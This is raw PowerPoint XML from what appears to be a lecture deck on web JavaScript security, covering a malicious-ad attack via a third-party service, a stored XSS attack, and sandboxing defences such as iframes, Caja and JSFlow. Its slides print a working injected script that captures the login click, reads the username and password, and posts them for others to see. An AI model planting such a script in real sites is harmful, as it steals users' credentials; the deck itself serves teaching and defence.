              <a:t>encodeURIComponent</a:t>
            </a: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(password));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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    });</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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  } </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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&lt;/script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&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12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Malicious ad</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rektangel med rundade hörn 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1033190" y="4121332"/>
            <a:ext cx="7200042" cy="21352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shade val="70000"/>
                  <a:satMod val="150000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="34000">
                <a:schemeClr val="accent6">
                  <a:shade val="70000"/>
                  <a:satMod val="140000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="70000">
                <a:schemeClr val="accent6">
                  <a:tint val="100000"/>
                  <a:shade val="90000"/>
                  <a:satMod val="140000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent6">
                  <a:tint val="100000"/>
                  <a:shade val="100000"/>
                  <a:satMod val="100000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect l="100000" t="100000" r="100000" b="100000"/>
            </a:path>
            <a:tileRect/>
          </a:gra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Rundad rektangulär 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2609923" y="2622688"/>
            <a:ext cx="1680308" cy="653240"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 20168"/>
              <a:gd name="adj2" fmla="val 11177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Capture login click</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rektangel med rundade hörn 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1033190" y="5288904"/>
            <a:ext cx="6175353" cy="403202"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent6">
                  <a:shade val="70000"/>
                  <a:satMod val="150000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="34000">
                <a:schemeClr val="accent6">
                  <a:shade val="70000"/>
                  <a:satMod val="140000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="70000">
                <a:schemeClr val="accent6">
                  <a:tint val="100000"/>
                  <a:shade val="90000"/>
                  <a:satMod val="140000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent6">
                  <a:tint val="100000"/>
                  <a:shade val="100000"/>
                  <a:satMod val="100000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect l="100000" t="100000" r="100000" b="100000"/>
            </a:path>
            <a:tileRect/>
          </a:gra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Rundad rektangulär 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172277" y="1149525"/>
            <a:ext cx="1836615" cy="1139091"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -66478"/>
              <a:gd name="adj2" fmla="val 40440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Different image to make attack visible</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rundad rektangulär 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5760580" y="4424121"/>
            <a:ext cx="1836615" cy="633338"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -64134"/>
              <a:gd name="adj2" fmla="val -39424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Destination of password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rundad rektangulär 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6034090" y="2949308"/>
            <a:ext cx="1680308" cy="653240"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -67581"/>
              <a:gd name="adj2" fmla="val 22816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login button</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rundad rektangulär 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6678887" y="5809512"/>
            <a:ext cx="1836615" cy="633338"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -45383"/>
              <a:gd name="adj2" fmla="val -102296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Send password!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723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derrubrik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injection via faulty 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> party service</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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8" name="Bildobjekt 7" descr="img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496" y="613726"/>
            <a:ext cx="1281545" cy="128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713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5" descr="Screen Shot 2015-08-10 at 12.06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33" y="1666544"/>
            <a:ext cx="7180125" cy="4956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ubrik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 1: Malicious ad client</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rundad rektangulär 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7077707" y="1946885"/>
            <a:ext cx="1836615" cy="633338"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -55669"/>
              <a:gd name="adj2" fmla="val 99894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Malicious ad!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rundad rektangulär 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4855182" y="4832813"/>
            <a:ext cx="1836615" cy="633338"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -40240"/>
              <a:gd name="adj2" fmla="val -89037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Pastebox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rundad rektangulär 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="224736" y="5202918"/>
            <a:ext cx="1836615" cy="633338"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 18619"/>
              <a:gd name="adj2" fmla="val -10063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Credentials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53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Screen Shot 2015-08-10 at 12.08.0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0706" y="1655539"/>
            <a:ext cx="7184796" cy="496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 1: Malicious ad Client</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rundad rektangulär 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3950556" y="4982826"/>
            <a:ext cx="1836615" cy="633338"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 18619"/>
              <a:gd name="adj2" fmla="val -10063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Credentials!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75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80999" y="1719071"/>
            <a:ext cx="8407893" cy="497304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Prohibit included scripts from causing harm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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>frame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> inclusion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is too restrictive – cannot access original page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makes communication with included scripts hard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At the same time – maybe not restrictive enough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allows e.g. opening of windows, communication with origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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Web sandboxing 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tries to remedy the shortcomings – uses a combination of static and dynamic checks to ensure that programs cannot misbehave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typically allows a subset of JavaScript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Examples include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AdSafe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r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Caja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, Secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EcmaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, FBJS (discontinued?), and Microsoft Web Sandbox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Brittle – historically multiple ways to escape the sandboxes have been found</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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HTML5 sandboxes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addition to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iframes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – gives more control on the behavior of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iframe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protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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87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90526" y="1719071"/>
            <a:ext cx="2428875" cy="182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5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JSFlow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – the ad attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Bildobjekt 2" descr="Screen Shot 2015-08-10 at 15.08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0"/>
            <a:ext cx="8283462" cy="554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4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Attack 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>scritping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278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objekt 15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 flipV="1">
            <a:off x="144824" y="5330908"/>
            <a:ext cx="1914938" cy="93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7" name="Bildobjekt 36" descr="cloud-icon-png-cloud-1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759" y="2201405"/>
            <a:ext cx="3106856" cy="3106856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Web app? </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Bildobjekt 2" descr="search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754" y="2753367"/>
            <a:ext cx="1066800" cy="106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Bildobjekt 8" descr="imgres.jp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978" y="3994621"/>
            <a:ext cx="1126576" cy="1126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Bildobjekt 9" descr="search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081" y="5342397"/>
            <a:ext cx="908646" cy="9086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Bildobjekt 17" descr="search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181" y="5322511"/>
            <a:ext cx="935999" cy="935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Bildobjekt 22" descr="imgres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701" y="5315044"/>
            <a:ext cx="935999" cy="935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9" name="Rak pil 28"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5845301" y="3380191"/>
            <a:ext cx="1266699" cy="1295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Rak pil 30"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6072000" y="4118584"/>
            <a:ext cx="1040000" cy="26161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ruta 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3303471" y="3909067"/>
            <a:ext cx="2300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Collaboration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38" name="Bildobjekt 37" descr="images.png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22936" r="880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68" r="18338"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1191193" y="2758428"/>
            <a:ext cx="382022" cy="6598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9" name="Bildobjekt 38" descr="images.png"/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67742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659"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="698500" y="3884705"/>
            <a:ext cx="794805" cy="4954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0" name="Bildobjekt 39" descr="pc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48" y="4840897"/>
            <a:ext cx="816159" cy="8161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41" name="Rak pil 40"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1694223" y="3088360"/>
            <a:ext cx="1133636" cy="64080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Rak pil 41"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1493305" y="4118584"/>
            <a:ext cx="133455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Rak pil 42"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1846623" y="4569635"/>
            <a:ext cx="981236" cy="64046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Bildobjekt 1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95519" y="5330908"/>
            <a:ext cx="935999" cy="935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4" name="Bildobjekt 4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921500" y="5315044"/>
            <a:ext cx="935998" cy="9359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5" name="Bildobjekt 4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68013" y="5322512"/>
            <a:ext cx="935998" cy="9359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22492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Malicious user - XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Bildobjekt 3" descr="Screen Shot 2015-08-10 at 13.31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21" y="1676821"/>
            <a:ext cx="7294133" cy="4968000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Bildobjekt 4" descr="Screen Shot 2015-08-10 at 13.33.0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63" y="1890000"/>
            <a:ext cx="7294133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03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XSS attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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3234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Content is not sanitized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Injection possible by posting malicious content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Let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is inject the following script that makes the user post his on credentials while logging in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Platshållare för innehåll 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2957297"/>
            <a:ext cx="7922491" cy="35656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ourier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;script&gt;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"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> login = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>("login");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ourier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  if (login) {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ourier"/>
                <a:cs typeface="Courier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urier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>login.addEventListener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>("click", function () {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00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1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> username = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>document.getElementsByName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>("username")[0].value;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1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> password = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>document.getElementsByName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>("password")[0].value;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00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1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> data = '{ "name"  : "' + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>encodeURIComponent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>(username) +' ",' + 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ourier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>                 '  "title" : "XSS, I have been owned!",' +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ourier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>                 '  "text"  : "My password is ' + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>encodeURIComponent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>(password) + '"}';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00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1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="10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"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>req</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>();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1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>req.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>('POST', '/post');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1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>req.setRequestHeader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>("Content-type", "application/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>");      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1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>req.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>(data);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ourier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>    });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ourier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  }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ourier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1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7" name="Rektangel med rundade hörn 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014347" y="4085127"/>
            <a:ext cx="5183909" cy="21352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shade val="70000"/>
                  <a:satMod val="150000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="34000">
                <a:schemeClr val="accent6">
                  <a:shade val="70000"/>
                  <a:satMod val="140000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="70000">
                <a:schemeClr val="accent6">
                  <a:tint val="100000"/>
                  <a:shade val="90000"/>
                  <a:satMod val="140000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent6">
                  <a:tint val="100000"/>
                  <a:shade val="100000"/>
                  <a:satMod val="100000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect l="100000" t="100000" r="100000" b="100000"/>
            </a:path>
            <a:tileRect/>
          </a:gra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Rektangel med rundade hörn 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1838030" y="4809851"/>
            <a:ext cx="5631874" cy="21352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shade val="70000"/>
                  <a:satMod val="150000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="34000">
                <a:schemeClr val="accent6">
                  <a:shade val="70000"/>
                  <a:satMod val="140000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="70000">
                <a:schemeClr val="accent6">
                  <a:tint val="100000"/>
                  <a:shade val="90000"/>
                  <a:satMod val="140000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent6">
                  <a:tint val="100000"/>
                  <a:shade val="100000"/>
                  <a:satMod val="100000"/>
                  <a:alpha val="7000"/>
